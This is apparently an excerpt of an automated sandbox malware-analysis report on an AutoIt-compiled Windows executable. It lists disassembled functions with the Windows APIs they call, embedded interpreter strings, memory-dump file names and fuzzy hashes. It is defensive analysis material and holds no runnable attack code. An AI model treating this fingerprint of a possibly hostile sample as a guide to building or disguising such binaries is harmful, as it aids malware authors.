                                                                        • Part of subcall function 00007FF643926838: CreateFileW.KERNELBASE ref: 00007FF6439268A2
                                                                        • Part of subcall function 00007FF643944380: GetCurrentDirectoryW.KERNEL32(?,00007FF64392E817), ref: 00007FF64394439C
                                                                        • Part of subcall function 00007FF6439256D4: GetFullPathNameW.KERNEL32(?,00007FF6439256C1,?,00007FF643927A0C,?,?,?,00007FF64392109E), ref: 00007FF6439256FF
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF64392E8B0
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF64392E9FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 2207129308-1018226102
                                                                      • Opcode ID: d93d2fcac344bfa50c4b65b154df6cf46a9181193a17983d9db00a7a2bc679d6
                                                                      • Instruction ID: 8e4d5b2054deb3fb9e200cedd4d854587937d6038b9177110f7b210ba8f655d9
                                                                      • Opcode Fuzzy Hash: d93d2fcac344bfa50c4b65b154df6cf46a9181193a17983d9db00a7a2bc679d6
                                                                      • Instruction Fuzzy Hash: EA12A222A1CA4286EB10FB65D4821FE6360FB95794F900532EA8DE779BEF7CD505D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                      • Instruction ID: a41b3ee28d04dd034adf3ab3c51289168855c409a8a7ff9d282f43e92d2ba01f
                                                                      • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                                      • Instruction Fuzzy Hash: 9D714E22E0CB4685FB14BF26E4821BD2760FB44B98B545435DE0EEB7A6EF38E445E340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                      • String ID: 5$Ping
                                                                      • API String ID: 1486594354-1972892582
                                                                      • Opcode ID: 0ec1798a1b5ca57b1af38744d7dba7a0259e384c6a48a514ec354c764ae3808c
                                                                      • Instruction ID: 9ed99c164b867ffeb2b612a8e44e2b292e5349835121eb98e687f411892cb0f2
                                                                      • Opcode Fuzzy Hash: 0ec1798a1b5ca57b1af38744d7dba7a0259e384c6a48a514ec354c764ae3808c
                                                                      • Instruction Fuzzy Hash: C3718D62A0CA4282EB24FB16D5823BD2760FF85B90F128831DA5DDB796EF7CD541E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                      • API String ID: 3215553584-2617248754
                                                                      • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                      • Instruction ID: 90ccace967762ba796ec1162ffb8c422950506f020564d360f12fa6584eccb8e
                                                                      • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                      • Instruction Fuzzy Hash: F841AE32A0AB45C9F750EF25E8427ED33A4EB18398F044135EE9DA7B96EE38D465C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 4007322891-4153970271
                                                                      • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                      • Instruction ID: 7572c5b9972dbbca5ec25be55ef8fd4260418ade4d82fc585244decbb26f06bf
                                                                      • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                      • Instruction Fuzzy Hash: 9E314F32A1CA8295EB10FB15E8425E96361FF44B84F944432EA4DE379BEF7CE505DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 2573188126-1403004172
                                                                      • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                      • Instruction ID: 20a1aca0bbf168d374998f87900e56b0818b06c0cefd43fdad84ab7138244c3a
                                                                      • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                      • Instruction Fuzzy Hash: 8E31EF22A0CA8182FB10FB55E8561B96361BFC9BE0F444130DA9DD379BEF2CD509DB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 2479661705-3771769585
                                                                      • Opcode ID: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                      • Instruction ID: 8133352bec1e5fcffe049737d039632b0dbf6cb71cf87091f87abc9aecc203e7
                                                                      • Opcode Fuzzy Hash: c022dea36b0d6b041929f70b141b9e152a2f360cd32598783c827dc949a89afb
                                                                      • Instruction Fuzzy Hash: 68215C62A0C98385FA24BB11E9863BD6321AF94B84F844131D55EE77A7FF2CE544EB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                      • String ID:
                                                                      • API String ID: 2672075419-0
                                                                      • Opcode ID: a1eb6c33f5007d6948db9cc7f2b7f3ccfad42800534a20bf92c78556409ba2f6
                                                                      • Instruction ID: fcfd7b9496dfaab0dac1872f340a38267488d0a064e8d605373e4226babe4a5e
                                                                      • Opcode Fuzzy Hash: a1eb6c33f5007d6948db9cc7f2b7f3ccfad42800534a20bf92c78556409ba2f6
                                                                      • Instruction Fuzzy Hash: DD915E36B0C6528AFB90BF65E4473BD23A1AB44B88F504035DE1DE779AEF38E445A710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction ID: 5901626f0c66c76dc4acb5ed28629bf08087a0fecceef2264f1cd41e63a34602
                                                                      • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction Fuzzy Hash: 6D317334F0C612C6EB61BF25A84663976A1AF48750F104038CD4EE7B95FF7DE889AB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 685491774-0
                                                                      • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction ID: e9901a1636e0ddd00282d56e8e797181c53bb610a777e5efffcd6c5907e8b9c2
                                                                      • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction Fuzzy Hash: DB11AF36B0CA0282F744BB66E89A56D2261AFCCB80F409038CA5EDBB56EF3DD4559750
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction ID: 05b96a0dba293261bcf9c69e7cd443f0a4b4a720d0fa5eaa064e04bb6f7c6edb
                                                                      • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction Fuzzy Hash: 0112B363B2DA4391FA5CBF20E8032F96291BFA4744F845531DA1FE6292FF3CE555A200
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                      • API String ID: 3467423407-1765764032
                                                                      • Opcode ID: ea568adb244a7073c7588fd76bcbdbb876fa72eb7a4f8d817ce143bae060e33b
                                                                      • Instruction ID: b572c6824d89e475e1ab4815ec2267b6a8b33da3d0ed0352ceb67c0758aa3a1b
                                                                      • Opcode Fuzzy Hash: ea568adb244a7073c7588fd76bcbdbb876fa72eb7a4f8d817ce143bae060e33b
                                                                      • Instruction Fuzzy Hash: E7A19D36A0CB4186EB20BF65E4416AD67A0FF88B98F540232DA4DEB756EF3CD545D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                      • String ID: -----$SysListView32
                                                                      • API String ID: 2361508679-3975388722
                                                                      • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction ID: f88fbb49ca5bce363b9cc2f61069a0bde402cf3fc389d028823b3d1da7d43161
                                                                      • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                      • Instruction Fuzzy Hash: B351F333A087918AE720EF64D8456DD33A1FB84784F40013AEE4D97B5ADF38D994DB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 2019164449-3381328864
                                                                      • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction ID: 1b6dace1602780c4091eb94f44b998f5ec0fe2ed57f3f57b0c55927859032e1d
                                                                      • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                      • Instruction Fuzzy Hash: 33215E22F2C90390FB64BB11E9562B92361AFD17C4F509036DD1EE7697FE2CE506AB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                      • String ID:
                                                                      • API String ID: 1903627254-0
                                                                      • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction ID: 590ab4819e219e990dc4b02d77d60d3a4f26d24b0b081843c3760cd7c336868c
                                                                      • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                      • Instruction Fuzzy Hash: 4D026D62A0CA8686EB50FF29D4851AD6760FB84F88F105132EF4E9BB65EF3CD549D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                      • String ID:
                                                                      • API String ID: 3210457359-0
                                                                      • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction ID: 2c37064e6c727128ddca600ef30d8c4a411390a9cf5cc699a01a819cd1e9a7a6
                                                                      • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                      • Instruction Fuzzy Hash: 1A61B321A1C58386FB74BA6598837B92A51BF80794F108531DA1EE36D7EF7DE442FB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction ID: a4b901dd13e952a70fa9ec31b1f72dbfc09624a0c861eee212f5fe01111836c4
                                                                      • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                      • Instruction Fuzzy Hash: 1D215932919B8182E750EF42E44A36AB7A0F788FDAF444125DA8D93B65DF3CD1088B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: ?
                                                                      • API String ID: 500310315-1684325040
                                                                      • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction ID: 976a484d1b9d89a5c73164acf80a26dc8b8174ee82f1380f6940ed23fbdb952d
                                                                      • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                      • Instruction Fuzzy Hash: EC61F232A0C64286E714FF25E8425A977A4FF44784F442136EA4DE3A96EF3CE480E790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
